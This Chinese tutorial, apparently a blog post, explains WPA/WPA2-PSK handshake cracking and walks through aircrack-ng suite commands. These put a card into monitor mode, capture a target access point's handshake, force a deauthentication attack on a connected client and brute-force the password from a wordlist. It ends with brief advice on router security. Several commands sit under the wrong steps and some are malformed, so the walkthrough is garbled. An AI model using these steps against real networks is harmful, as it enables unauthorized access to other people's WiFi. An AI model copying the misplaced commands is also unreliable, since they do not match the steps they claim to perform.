在这篇文章中,我们将讨论WiFi密码的破解和防范。请注意,本教程仅供学术和网络技术爱好者探讨使用。
- WiFi破解原理
本章节将介绍WiFi的认证方式、认证过程以及利用认证进行破解的基本原理。
1.1 WiFi认证方式
常见的WiFi认证方式包括:
- 不启用安全认证
- WEP认证
- WPA/WPA2-PSK认证
- WPA/WPA2 802.1X认证(radius认证)
一般来说,我们常用的是第三种方式。在路由器的配置界面中,通常如下图所示:
1.2 WPA-PSK的认证过程
- 无线AP定期发送beacon数据包,使无线终端更新自己的无线网络列表。
- 无线终端在每个信道(1-13)广播ProbeRequest(非隐藏类型的WiFi含ESSID,隐藏类型的WiFi不含ESSID)。
- 每个信道的AP回应ProbeResponse,包含ESSID和RSN信息。
- 无线终端给目标AP发送AUTH包。AUTH认证类型有两种,0为开放式,1为共享式(WPA/WPA2必须是开放式)。
- AP回应网卡的AUTH包。
- 无线终端给AP发送关联请求包associationrequest数据包。
- AP给无线终端发送关联响应包associationresponse数据包。
- 进行EAPOL四次握手认证(握手包是破解的关键)。
- 完成认证,即可上网。
1.3 WPA-PSK认证四次握手认证的过程
1.4 WPA-PSK破解原理
破解WPA-PSK的原理是,首先使用字典中的PSK+SSID生成PMK(这是目前破解的瓶颈,耗时最长),然后结合握手包中的客户端MAC、AP的BSSID、A-NONCE和S-NONCE计算PTK,再加上原始的报文数据计算MIC,并与AP发送的MIC进行比较,如果一致,则该PSK就是密码。
如下图所示:
service network-manager stop
airmon-ng check kill
ifconfig
iwconfig
ifconfig wlan0 up
- WiFi破解过程
2.1 破解WiFi实战
(1)关闭网络管理器,以防干扰。
(2)查看本机电脑的无线网卡,如果没有无线网卡,请插入USB无线网卡。如果是插入USB网卡,请加载无线网卡。
(3)激活网卡为监听(monitor)模式,得到监控模式下的设备名,如mon0或wlan0mon,请记住这个名字。
(4)探测周围无线网络,查看周边路由AP的信息。一般来说,信号强度大于-70的网络可以进行破解,大于-60最好,小于-70的信号较弱且不稳定(信号强度的绝对值越小表示信号越强)。
airodump-ng --ignore-negative-one -w /tmp/test.cap-c 11 --bssid 40:16:9F:76:E7:DE mon0
aireplay-ng -0 3 -a B8:A3:86:63:B4:06 -c 00:18:1a:10:da:c9 -x 200 mon0
(5)选择要破解的WiFi,有针对性地抓取握手包。使用命令参数-w指定数据包的文件名,-c指定信道,-bssid指定AP的MAC地址。也可以使用其他工具如Wireshark、Tcpdump来抓包,抓到握手包会有提示。
(6)模拟目标WiFi,向可信客户端发起断链攻击。为了顺利抓取握手包,我们需要使用DEAUTH攻击使已连接的客户端断开并重新连接,以产生握手包(注意:抓握手包破解必须有合法的客户端)。
攻击命令如下:
aircrack-ng-w pass-haoyong.txt test-03.cap
如果攻击成功,Airodump-ng将捕获到握手包,此时可以使用Ctrl+C终止Airodump-ng的抓包。
(7)通过字典暴力破解捕获到的加密密码。
service network-manager start
参数解释:-w指定字典路径。如果字典中存在对方的密码,经过一段时间后就会破解成功,并最终显示FOUND KEY!的字样。
(8)破解成功后,恢复网络环境。
2.2 关于WiFi安全的建议
(1)不要使用WEP方式加密路由器密码,因为WPA2-PSK的加密方式是不可逆的,而WEP是可逆的,无论密码多么复杂,都可以被轻易破解。
(2)选择WPA2-PSK加密方式,并避免使用常见的密码,如简单的123456aa。因为常用的密码字典中通常包含这些密码,所以很容易被破解。
(3)密码应稍微复杂一些,长度不要局限于8位。
视频链接:
资料链接:[链接] 密码:rn7i
直播视频链接:[链接]